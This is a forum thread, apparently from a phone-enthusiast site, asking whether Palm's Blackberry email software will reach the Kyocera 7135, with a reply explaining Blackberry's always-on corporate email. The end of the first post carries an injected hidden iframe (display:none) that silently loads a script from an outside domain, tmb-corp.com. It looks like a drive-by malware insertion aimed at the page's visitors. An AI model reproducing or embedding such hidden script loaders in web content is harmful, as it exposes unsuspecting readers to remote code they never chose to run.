+ Reply to Thread

Palm and Blackberry

I know that Palm and Blackberry are working on a joint venture that will allow Palm devices to have full Blackberry functionallity. My understanding is that this is expected to be released by year end. I also understand that in order to use this program you would need to purchase a Palm "capable" device. I contacted Blackberry about this and learned that the software could in fact be utilized in any device after a software upgrade. I contacted Kyocera about this and they knew nothing about it and therefore couldn't provide any help as to whether there would be a software upgrade to accomodate Blackberry functionality. That is not surprising since it would appear that the software upgrade would need to come from the Palm and Verizon side. I also contacted Palm and Verizon, but wasn't able to get any additional information. Does anyone have any additional information about this and whether the Blackberry functionality will be available for the 7135? It appears that it would be a perfect match for the 7135 and Palm could make some $ by selling the software. I have used a Blackberry phone model in the past and liked the email aspect of it, but hated it as a phone. For all of us that would like streaming email, but have a phone first, this seems like a perfect solution. I presently use Basejet and it's an excellent program, however, it doesn't offer streaming email.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Can you fill in some blanks for those of us that are not familiar with the Blackberry funstionality? Is it just an "always on" kind of email? Or are there other benefits?

Originally posted by harleyxlc
    Can you fill in some blanks for those of us that are not familiar with the Blackberry funstionality? Is it just an "always on" kind of email? Or are there other benefits?
    Blackberry is an always on email system. It is very popular in the corporate environment and most companies running MS Exhange servers now integrate with Blackberry. Basically, it allows you to receive corporate email (regardless of whether your individual PC is on) in the same manner as you would on your PC. You can also read attachments.